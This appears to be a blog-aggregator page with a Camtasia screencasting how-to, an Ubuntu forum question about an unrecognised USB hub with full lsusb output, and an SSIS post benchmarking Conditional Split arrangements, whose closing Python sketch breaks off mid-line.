technology and demo. Once you think you know it, write down the outline and major steps of the demo. Keep it short 5-20 minutes max. I break that rule sometimes but try not to. The longer the video is the more chances that people will not have the patience to sit through it and the larger the download wmv file ends up being. Run your demo a few times, timing yourself each time to ensure that you have the planned timing correct, but also to make sure that you are comfortable with what you are going to demo. Unlike with a live audience, there is no live reaction/feedback to steer you, so it can be a bit unnerving at first. It can also lead you to babble too much, so try extra hard to be succinct when demoing/screencasting on your own. TIP: Before recording, hide your desktop/taskbar clock if it is showing. Recording To record you start the Camtasia Recorder tool Configure the settings thought the menus Capture menu to choose custom size or full screen. I try to use full screen and remember to lower the resolution of your screen to as low as possible, e.g. 1024x768 or 1360x768 or something like that. From the Tools -> Options dialog you can choose to record audio and the volume level. Effects menu I typically leave untouched but you should explore and experiment to your liking, e.g. 
how the mouse pointer is captured, and whether there should be a delay for the recording when you start it. Once you've configured these settings, typically you just launch this tool and hit the F9 key to start recording. TIP: As you record, if you ever start to "lose your way" hit F9 again to pause recording, regroup your thoughts and flow, and then hit F9 again to resume. Finally, hit F10 to stop recording. At that point the video starts playing for you in the recorder. This is where you can preview the video to see that you are happy with it before saving. If you are happy, hit the Save As menu to choose where you want to save the video.     TIP: If you've really lost your way to the extent where you'll need to do some editing, hit F10 to stop recording, save the video and then record some more - you'll be able to stitch the videos together later and this will make it easier for you to delete the parts where you messed up. TIP: Before you commit to recording the whole demo, every time you should record 5 seconds and preview them to ensure that you are capturing the screen the way you want to and that your audio is still correctly configured and at the right level. Trust me, you do not want to be recording 15 minutes only to find out that you messed up on the configuration somewhere. Editing To edit the video you launch another Camtasia app, the Camtasia Studio. File->New Project. File->Save Project and choose location. File->Import Media and choose the video(s) you saved earlier. These adds them to the area at the top/middle but not at the timeline at the bottom. Right click on the video and choose Add to timeline. It will prompt you for the Editing dimensions and I always choose Recording Dimensions. Do whatever edits you want to do for this video, then add the next video if you have one to stitch and repeat. In terms of edits there are many options. The simplest is to do nothing, which is the option I did when I first starting doing these in 2006. Nowadays, I typically cut out pieces that I don't like and also lower/mute the audio in other areas and also speed up the video in some areas. A full tutorial on how to do this is beyond the scope of this blog post, but your starting point is to select portions on the timeline and then open the Edit menu at the very top (tip: the context menu doesn't have all options). You can spend hours editing a recording, so don’t lose track of time! When you are done editing, save again, and you are now ready to Produce. Producing Production is specific to where you will publish. I've only ever published on channel9, so for that I do the following File -> Produce and share. This opens a wizard dialog In the dropdown choose Custom production settings Hit Next and then choose WMV Hit Next and keep the default of Camtasia Studio Best Quality and File Size (recommended) Hit Next and choose Editing dimensions video size Hit Next, hit Options and you get a dialog. Enter a Title for the project tab and then on the author tab enter the Creator and Homepage. Hit OK Hit Next. Hit Next again. Enter a video file name in the Production name textbox and then hit Finish. Now do other stuff while you wait for the video to be produced and you hear it playing. After the video is produced watch it to ensure it was produced correctly (e.g. sometimes you get mouse issues) and then you are ready for publishing it. Publishing Follow the instructions of the place where you are going to publish. 
If you are MSFT internal and want to choose channel9 then contact those folks so they can share their instructions (if you don't know who they are ping me and I'll connect you but they are easy to find in the GAL). For me this involves using a tool to point to the video, choosing a file name (again), choosing an image from the video to display when it is not playing, choosing what output formats I want, and then later on a webpage adding tags, adding a description, and adding a title. That’s all folks, have fun! Comments about this post by Daniel Moth welcome at the original blog.

    Read the article

  • USB Hub and Ubuntu

    - by aserwin
    I have a powered 7 port hub connected to my Ubuntu box and it does nothing. The devices (zip drive and web cam) work direct, but aren't recognized through the hub. This worked fine in Windows 7. I can't prove it is the OS because this is a new motherboard and processor. Any advice? EDIT : Output from lsusb -v Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 2.00 bDeviceClass 9 Hub bDeviceSubClass 0 Unused bDeviceProtocol 0 Full speed (or root) hub bMaxPacketSize0 64 idVendor 0x1d6b Linux Foundation idProduct 0x0002 2.0 root hub bcdDevice 3.02 iManufacturer 3 Linux 3.2.0-32-generic ehci_hcd iProduct 2 EHCI Host Controller iSerial 1 0000:00:12.2 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 25 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 0 bmAttributes 0xe0 Self Powered Remote Wakeup MaxPower 0mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 9 Hub bInterfaceSubClass 0 Unused bInterfaceProtocol 0 Full speed (or root) hub iInterface 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0004 1x 4 bytes bInterval 12 Hub Descriptor: bLength 9 bDescriptorType 41 nNbrPorts 5 wHubCharacteristic 0x000a No power switching (usb 1.0) Per-port overcurrent protection bPwrOn2PwrGood 10 * 2 milli seconds bHubContrCurrent 0 milli Ampere DeviceRemovable 0x00 PortPwrCtrlMask 0xff Hub Port Status: Port 1: 0000.0100 power Port 2: 0000.0503 highspeed power enable connect Port 3: 0000.0100 power Port 4: 0000.0100 power Port 5: 0000.0100 power Device Status: 0x0001 Self Powered Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 2.00 bDeviceClass 9 Hub bDeviceSubClass 0 Unused bDeviceProtocol 0 Full speed (or root) hub bMaxPacketSize0 64 idVendor 0x1d6b Linux Foundation idProduct 0x0002 2.0 root hub bcdDevice 3.02 iManufacturer 3 Linux 3.2.0-32-generic ehci_hcd iProduct 2 EHCI Host Controller iSerial 1 0000:00:13.2 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 25 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 0 bmAttributes 0xe0 Self Powered Remote Wakeup MaxPower 0mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 9 Hub bInterfaceSubClass 0 Unused bInterfaceProtocol 0 Full speed (or root) hub iInterface 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0004 1x 4 bytes bInterval 12 Hub Descriptor: bLength 9 bDescriptorType 41 nNbrPorts 5 wHubCharacteristic 0x000a No power switching (usb 1.0) Per-port overcurrent protection bPwrOn2PwrGood 10 * 2 milli seconds bHubContrCurrent 0 milli Ampere DeviceRemovable 0x00 PortPwrCtrlMask 0xff Hub Port Status: Port 1: 0000.0100 power Port 2: 0000.0100 power Port 3: 0000.0100 power Port 4: 0000.0100 power Port 5: 0000.0100 power Device Status: 0x0001 Self Powered Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 2.00 bDeviceClass 9 Hub bDeviceSubClass 0 Unused bDeviceProtocol 0 Full speed (or root) hub bMaxPacketSize0 64 idVendor 0x1d6b Linux Foundation idProduct 0x0002 2.0 root hub bcdDevice 3.02 
iManufacturer 3 Linux 3.2.0-32-generic ehci_hcd iProduct 2 EHCI Host Controller iSerial 1 0000:00:16.2 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 25 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 0 bmAttributes 0xe0 Self Powered Remote Wakeup MaxPower 0mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 9 Hub bInterfaceSubClass 0 Unused bInterfaceProtocol 0 Full speed (or root) hub iInterface 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0004 1x 4 bytes bInterval 12 Hub Descriptor: bLength 9 bDescriptorType 41 nNbrPorts 4 wHubCharacteristic 0x000a No power switching (usb 1.0) Per-port overcurrent protection bPwrOn2PwrGood 10 * 2 milli seconds bHubContrCurrent 0 milli Ampere DeviceRemovable 0x00 PortPwrCtrlMask 0xff Hub Port Status: Port 1: 0000.0100 power Port 2: 0000.0100 power Port 3: 0000.0100 power Port 4: 0000.0100 power Device Status: 0x0001 Self Powered Bus 004 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 1.10 bDeviceClass 9 Hub bDeviceSubClass 0 Unused bDeviceProtocol 0 Full speed (or root) hub bMaxPacketSize0 64 idVendor 0x1d6b Linux Foundation idProduct 0x0001 1.1 root hub bcdDevice 3.02 iManufacturer 3 Linux 3.2.0-32-generic ohci_hcd iProduct 2 OHCI Host Controller iSerial 1 0000:00:12.0 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 25 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 0 bmAttributes 0xe0 Self Powered Remote Wakeup MaxPower 0mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 9 Hub bInterfaceSubClass 0 Unused bInterfaceProtocol 0 Full speed (or root) hub iInterface 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0002 1x 2 bytes bInterval 255 Hub Descriptor: bLength 9 bDescriptorType 41 nNbrPorts 5 wHubCharacteristic 0x0002 No power switching (usb 1.0) Ganged overcurrent protection bPwrOn2PwrGood 2 * 2 milli seconds bHubContrCurrent 0 milli Ampere DeviceRemovable 0x00 PortPwrCtrlMask 0xff Hub Port Status: Port 1: 0000.0100 power Port 2: 0000.0100 power Port 3: 0000.0100 power Port 4: 0000.0100 power Port 5: 0000.0100 power Device Status: 0x0001 Self Powered Bus 005 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 1.10 bDeviceClass 9 Hub bDeviceSubClass 0 Unused bDeviceProtocol 0 Full speed (or root) hub bMaxPacketSize0 64 idVendor 0x1d6b Linux Foundation idProduct 0x0001 1.1 root hub bcdDevice 3.02 iManufacturer 3 Linux 3.2.0-32-generic ohci_hcd iProduct 2 OHCI Host Controller iSerial 1 0000:00:13.0 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 25 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 0 bmAttributes 0xe0 Self Powered Remote Wakeup MaxPower 0mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 9 Hub bInterfaceSubClass 0 Unused bInterfaceProtocol 0 Full speed (or root) hub iInterface 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data 
wMaxPacketSize 0x0002 1x 2 bytes bInterval 255 Hub Descriptor: bLength 9 bDescriptorType 41 nNbrPorts 5 wHubCharacteristic 0x0002 No power switching (usb 1.0) Ganged overcurrent protection bPwrOn2PwrGood 2 * 2 milli seconds bHubContrCurrent 0 milli Ampere DeviceRemovable 0x00 PortPwrCtrlMask 0xff Hub Port Status: Port 1: 0000.0100 power Port 2: 0000.0100 power Port 3: 0000.0100 power Port 4: 0000.0100 power Port 5: 0000.0100 power Device Status: 0x0001 Self Powered Bus 006 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 1.10 bDeviceClass 9 Hub bDeviceSubClass 0 Unused bDeviceProtocol 0 Full speed (or root) hub bMaxPacketSize0 64 idVendor 0x1d6b Linux Foundation idProduct 0x0001 1.1 root hub bcdDevice 3.02 iManufacturer 3 Linux 3.2.0-32-generic ohci_hcd iProduct 2 OHCI Host Controller iSerial 1 0000:00:14.5 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 25 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 0 bmAttributes 0xe0 Self Powered Remote Wakeup MaxPower 0mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 9 Hub bInterfaceSubClass 0 Unused bInterfaceProtocol 0 Full speed (or root) hub iInterface 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0002 1x 2 bytes bInterval 255 Hub Descriptor: bLength 9 bDescriptorType 41 nNbrPorts 2 wHubCharacteristic 0x0002 No power switching (usb 1.0) Ganged overcurrent protection bPwrOn2PwrGood 2 * 2 milli seconds bHubContrCurrent 0 milli Ampere DeviceRemovable 0x00 PortPwrCtrlMask 0xff Hub Port Status: Port 1: 0000.0100 power Port 2: 0000.0100 power Device Status: 0x0001 Self Powered Bus 007 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 1.10 bDeviceClass 9 Hub bDeviceSubClass 0 Unused bDeviceProtocol 0 Full speed (or root) hub bMaxPacketSize0 64 idVendor 0x1d6b Linux Foundation idProduct 0x0001 1.1 root hub bcdDevice 3.02 iManufacturer 3 Linux 3.2.0-32-generic ohci_hcd iProduct 2 OHCI Host Controller iSerial 1 0000:00:16.0 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 25 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 0 bmAttributes 0xe0 Self Powered Remote Wakeup MaxPower 0mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 9 Hub bInterfaceSubClass 0 Unused bInterfaceProtocol 0 Full speed (or root) hub iInterface 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0002 1x 2 bytes bInterval 255 Hub Descriptor: bLength 9 bDescriptorType 41 nNbrPorts 4 wHubCharacteristic 0x0002 No power switching (usb 1.0) Ganged overcurrent protection bPwrOn2PwrGood 2 * 2 milli seconds bHubContrCurrent 0 milli Ampere DeviceRemovable 0x00 PortPwrCtrlMask 0xff Hub Port Status: Port 1: 0000.0303 lowspeed power enable connect Port 2: 0000.0100 power Port 3: 0000.0100 power Port 4: 0000.0100 power Device Status: 0x0001 Self Powered Bus 008 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 2.00 bDeviceClass 9 Hub bDeviceSubClass 0 Unused bDeviceProtocol 1 Single TT bMaxPacketSize0 64 idVendor 0x1d6b Linux Foundation idProduct 
0x0002 2.0 root hub bcdDevice 3.02 iManufacturer 3 Linux 3.2.0-32-generic xhci_hcd iProduct 2 xHCI Host Controller iSerial 1 0000:02:00.0 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 25 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 0 bmAttributes 0xe0 Self Powered Remote Wakeup MaxPower 0mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 9 Hub bInterfaceSubClass 0 Unused bInterfaceProtocol 0 Full speed (or root) hub iInterface 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0004 1x 4 bytes bInterval 12 Hub Descriptor: bLength 9 bDescriptorType 41 nNbrPorts 2 wHubCharacteristic 0x0009 Per-port power switching Per-port overcurrent protection TT think time 8 FS bits bPwrOn2PwrGood 10 * 2 milli seconds bHubContrCurrent 0 milli Ampere DeviceRemovable 0x00 PortPwrCtrlMask 0xff Hub Port Status: Port 1: 0000.0100 power Port 2: 0000.0100 power Device Status: 0x0001 Self Powered Bus 009 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 3.00 bDeviceClass 9 Hub bDeviceSubClass 0 Unused bDeviceProtocol 3 bMaxPacketSize0 9 idVendor 0x1d6b Linux Foundation idProduct 0x0003 3.0 root hub bcdDevice 3.02 iManufacturer 3 Linux 3.2.0-32-generic xhci_hcd iProduct 2 xHCI Host Controller iSerial 1 0000:02:00.0 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 31 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 0 bmAttributes 0xe0 Self Powered Remote Wakeup MaxPower 0mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 9 Hub bInterfaceSubClass 0 Unused bInterfaceProtocol 0 Full speed (or root) hub iInterface 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0004 1x 4 bytes bInterval 12 bMaxBurst 0 Hub Descriptor: bLength 12 bDescriptorType 42 nNbrPorts 2 wHubCharacteristic 0x0009 Per-port power switching Per-port overcurrent protection bPwrOn2PwrGood 10 * 2 milli seconds bHubContrCurrent 0 milli Ampere bHubDecLat 0.0 micro seconds wHubDelay 0 nano seconds DeviceRemovable 0x00 Hub Port Status: Port 1: 0000.02a0 5Gbps power Rx.Detect Port 2: 0000.02a0 5Gbps power Rx.Detect Binary Object Store Descriptor: bLength 5 bDescriptorType 15 wTotalLength 15 bNumDeviceCaps 1 SuperSpeed USB Device Capability: bLength 10 bDescriptorType 16 bDevCapabilityType 3 bmAttributes 0x00 Latency Tolerance Messages (LTM) Supported wSpeedsSupported 0x0008 Device can operate at SuperSpeed (5Gbps) bFunctionalitySupport 3 Lowest fully-functional device speed is SuperSpeed (5Gbps) bU1DevExitLat 3 micro seconds bU2DevExitLat 2047 micro seconds Device Status: 0x0001 Self Powered Bus 001 Device 002: ID 04a9:1709 Canon, Inc. PIXMA MP150 Scanner Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 2.00 bDeviceClass 0 (Defined at Interface level) bDeviceSubClass 0 bDeviceProtocol 0 bMaxPacketSize0 64 idVendor 0x04a9 Canon, Inc. 
idProduct 0x1709 PIXMA MP150 Scanner bcdDevice 1.08 iManufacturer 1 Canon iProduct 2 MP150 iSerial 3 20BC24 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 62 bNumInterfaces 2 bConfigurationValue 1 iConfiguration 0 bmAttributes 0xc0 Self Powered MaxPower 2mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 3 bInterfaceClass 255 Vendor Specific Class bInterfaceSubClass 0 bInterfaceProtocol 255 iInterface 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x07 EP 7 OUT bmAttributes 2 Transfer Type Bulk Synch Type None Usage Type Data wMaxPacketSize 0x0200 1x 512 bytes bInterval 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x88 EP 8 IN bmAttributes 2 Transfer Type Bulk Synch Type None Usage Type Data wMaxPacketSize 0x0200 1x 512 bytes bInterval 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x89 EP 9 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0040 1x 64 bytes bInterval 11 Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 1 bAlternateSetting 0 bNumEndpoints 2 bInterfaceClass 7 Printer bInterfaceSubClass 1 Printer bInterfaceProtocol 2 Bidirectional iInterface 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x01 EP 1 OUT bmAttributes 2 Transfer Type Bulk Synch Type None Usage Type Data wMaxPacketSize 0x0200 1x 512 bytes bInterval 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x82 EP 2 IN bmAttributes 2 Transfer Type Bulk Synch Type None Usage Type Data wMaxPacketSize 0x0200 1x 512 bytes bInterval 0 Device Qualifier (for other device speed): bLength 10 bDescriptorType 6 bcdUSB 2.00 bDeviceClass 0 (Defined at Interface level) bDeviceSubClass 0 bDeviceProtocol 0 bMaxPacketSize0 64 bNumConfigurations 1 Device Status: 0x0001 Self Powered Bus 007 Device 002: ID 046d:c517 Logitech, Inc. LX710 Cordless Desktop Laser Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 1.10 bDeviceClass 0 (Defined at Interface level) bDeviceSubClass 0 bDeviceProtocol 0 bMaxPacketSize0 8 idVendor 0x046d Logitech, Inc. 
idProduct 0xc517 LX710 Cordless Desktop Laser bcdDevice 38.10 iManufacturer 1 Logitech iProduct 2 USB Receiver iSerial 0 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 59 bNumInterfaces 2 bConfigurationValue 1 iConfiguration 0 bmAttributes 0xa0 (Bus Powered) Remote Wakeup MaxPower 98mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 3 Human Interface Device bInterfaceSubClass 1 Boot Interface Subclass bInterfaceProtocol 1 Keyboard iInterface 0 HID Device Descriptor: bLength 9 bDescriptorType 33 bcdHID 1.10 bCountryCode 0 Not supported bNumDescriptors 1 bDescriptorType 34 Report wDescriptorLength 59 Report Descriptors: ** UNAVAILABLE ** Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0008 1x 8 bytes bInterval 10 Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 1 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 3 Human Interface Device bInterfaceSubClass 1 Boot Interface Subclass bInterfaceProtocol 2 Mouse iInterface 0 HID Device Descriptor: bLength 9 bDescriptorType 33 bcdHID 1.10 bCountryCode 0 Not supported bNumDescriptors 1 bDescriptorType 34 Report wDescriptorLength 177 Report Descriptors: ** UNAVAILABLE ** Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x82 EP 2 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0008 1x 8 bytes bInterval 10 Device Status: 0x0000 (Bus Powered) This is with the powered hub plugged in.

    Read the article

  • Investigation: Can different combinations of components effect Dataflow performance?

    - by jamiet
    Introduction The Dataflow task is one of the core components (if not the core component) of SQL Server Integration Services (SSIS) and often the most misunderstood. This is not surprising, its an incredibly complicated beast and we’re abstracted away from that complexity via some boxes that go yellow red or green and that have some lines drawn between them. Example dataflow In this blog post I intend to look under that facade and get into some of the nuts and bolts of the Dataflow Task by investigating how the decisions we make when building our packages can affect performance. I will do this by comparing the performance of three dataflows that all have the same input, all produce the same output, but which all operate slightly differently by way of having different transformation components. I also want to use this blog post to challenge a common held opinion that I see perpetuated over and over again on the SSIS forum. That is, that people assume adding components to a dataflow will be detrimental to overall performance. Its not surprising that people think this –it is intuitive to think that more components means more work- however this is not a view that I share. I have always been of the opinion that there are many factors affecting dataflow duration and the number of components is actually one of the less important ones; having said that I have never proven that assertion and that is one reason for this investigation. I have actually seen evidence that some people think dataflow duration is simply a function of number of rows and number of components. I’ll happily call that one out as a myth even without any investigation!  The Setup I have a 2GB datafile which is a list of 4731904 (~4.7million) customer records with various attributes against them and it contains 2 columns that I am going to use for categorisation: [YearlyIncome] [BirthDate] The data file is a SSIS raw format file which I chose to use because it is the quickest way of getting data into a dataflow and given that I am testing the transformations, not the source or destination adapters, I want to minimise external influences as much as possible. In the test I will split the customers according to month of birth (12 of those) and whether or not their yearly income is above or below 50000 (2 of those); in other words I will be splitting them into 24 discrete categories and in order to do it I shall be using different combinations of SSIS’ Conditional Split and Derived Column transformation components. The 24 datapaths that occur will each input to a rowcount component, again because this is the least resource intensive means of terminating a datapath. The test is being carried out on a Dell XPS Studio laptop with a quad core (8 logical Procs) Intel Core i7 at 1.73GHz and Samsung SSD hard drive. Its running SQL Server 2008 R2 on Windows 7. The Variables Here are the three combinations of components that I am going to test:     One Conditional Split - A single Conditional Split component CSPL Split by Month of Birth and income category that will use expressions on [YearlyIncome] & [BirthDate] to send each row to one of 24 outputs. This next screenshot displays the expression logic in use: Derived Column & Conditional Split - A Derived Column component DER Income Category that adds a new column [IncomeCategory] which will contain one of two possible text values {“LessThan50000”,”GreaterThan50000”} and uses [YearlyIncome] to determine which value each row should get. 
A Conditional Split component CSPL Split by Month of Birth and Income Category then uses that new column in conjunction with [BirthDate] to determine which of the same 24 outputs to send each row to. Put more simply, I am separating the Conditional Split of #1 into a Derived Column and a Conditional Split. The next screenshots display the expression logic in use: DER Income Category         CSPL Split by Month of Birth and Income Category       Three Conditional Splits - A Conditional Split component that produces two outputs based on [YearlyIncome], one for each Income Category. Each of those outputs will go to a further Conditional Split that splits the input into 12 outputs, one for each month of birth (identical logic in each). In this case then I am separating the single Conditional Split of #1 into three Conditional Split components. The next screenshots display the expression logic in use: CSPL Split by Income Category         CSPL Split by Month of Birth 1 & 2       Each of these combinations will provide an input to one of the 24 rowcount components, just the same as before. For illustration here is a screenshot of the dataflow containing three Conditional Split components: As you can see, these dataflows have a fair bit of work to do and remember that they’re doing that work for 4.7 million rows. I will execute each dataflow 10 times and use the average for comparison. I foresee three possible outcomes: (1) the dataflow containing just one Conditional Split (i.e. #1) will be quicker; (2) there is no significant difference between any of them; (3) one of the two dataflows containing multiple transformation components will be quicker. Regardless of which of those outcomes comes to pass we will have learnt something and that makes this an interesting test to carry out. Note that I will be executing the dataflows using dtexec.exe rather than hitting F5 within BIDS. The Results and Analysis The table below shows all of the executions, 10 for each dataflow. It also shows the average for each along with a standard deviation. All durations are in seconds. I’m pasting a screenshot because I frankly can’t be bothered with the faffing about needed to make a presentable HTML table. It is plain to see from the average that the dataflow containing three conditional splits is significantly faster, the other two taking 43% and 52% longer respectively. This seems strange though, right? Why does the dataflow containing the most components outperform the other two by such a big margin? The answer is actually quite logical when you put some thought into it and I’ll explain that below. Before progressing, a side note. The standard deviation for the “Three Conditional Splits” dataflow is orders of magnitude smaller – indicating that performance for this dataflow can be predicted with much greater confidence too. The Explanation I refer you to the screenshot above that shows how CSPL Split by Month of Birth and income category in the first dataflow is set up. Observe that there is a case for each combination of Month of Birth and Income Category – 24 in total. These expressions get evaluated in the order that they appear and hence, if we assume that Month of Birth and Income Category are uniformly distributed in the dataset, we can deduce that the expected number of expression evaluations for each row is 12.5, i.e. the average of 1 (the minimum) and 24 (the maximum). Now take a look at the screenshots for the second dataflow.
We are doing one expression evaluation in DER Income Category and we have the same 24 cases in CSPL Split by Month of Birth and Income Category as we had before, only the expression differs slightly. In this case then we have 1 + 12.5 = 13.5 expected evaluations for each row – that would account for the slightly longer average execution time for this dataflow. Now onto the third dataflow, the quick one. CSPL Split by Income Category does a maximum of 2 expression evaluations thus the expected number of evaluations per row is 1.5. CSPL Split by Month of Birth 1 & CSPL Split by Month of Birth 2 both have less work to do than the previous Conditional Split components because they only have 12 cases to test for thus the expected number of expression evaluations is 6.5 There are two of them so total expected number of expression evaluations for this dataflow is 6.5 + 6.5 + 1.5 = 14.5. 14.5 is still more than 12.5 & 13.5 though so why is the third dataflow so much quicker? Simple, the conditional expressions in the first two dataflows have two boolean predicates to evaluate – one for Income Category and one for Month of Birth; the expressions in the Conditional Split in the third dataflow however only have one predicate thus they are doing a lot less work. To sum up, the difference in execution times can be attributed to the difference between: MONTH(BirthDate) == 1 && YearlyIncome <= 50000 and MONTH(BirthDate) == 1 In the first two dataflows YearlyIncome <= 50000 gets evaluated an average of 12.5 times for every row whereas in the third dataflow it is evaluated once and once only. Multiply those 11.5 extra operations by 4.7million rows and you get a significant amount of extra CPU cycles – that’s where our duration difference comes from. The Wrap-up The obvious point here is that adding new components to a dataflow isn’t necessarily going to make it go any slower, moreover you may be able to achieve significant improvements by splitting logic over multiple components rather than one. Performance tuning is all about reducing the amount of work that needs to be done and that doesn’t necessarily mean use less components, indeed sometimes you may be able to reduce workload in ways that aren’t immediately obvious as I think I have proven here. Of course there are many variables in play here and your mileage will most definitely vary. I encourage you to download the package and see if you get similar results – let me know in the comments. The package contains all three dataflows plus a fourth dataflow that will create the 2GB raw file for you (you will also need the [AdventureWorksDW2008] sample database from which to source the data); simply disable all dataflows except the one you want to test before executing the package and remember, execute using dtexec, not within BIDS. If you want to explore dataflow performance tuning in more detail then here are some links you might want to check out: Inequality joins, Asynchronous transformations and Lookups Destination Adapter Comparison Don’t turn the dataflow into a cursor SSIS Dataflow – Designing for performance (webinar) Any comments? Let me know! @Jamiet
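Because the expected-evaluation arithmetic above is easy to lose track of in prose, here is a small sketch that simply replays the post's own numbers; the uniform-distribution assumption and the per-component case counts come from the text, nothing else is measured:

    # Replays the expected expression evaluations per row from the post.
    # Assumes, as the post does, that Month of Birth (12 values) and Income
    # Category (2 values) are uniformly distributed, so a Conditional Split
    # with n cases evaluates (1 + n) / 2 expressions per row on average.
    ROWS = 4731904  # rows in the 2GB raw input file

    def expected_evaluations(cases):
        return (1 + cases) / 2.0

    scenarios = [
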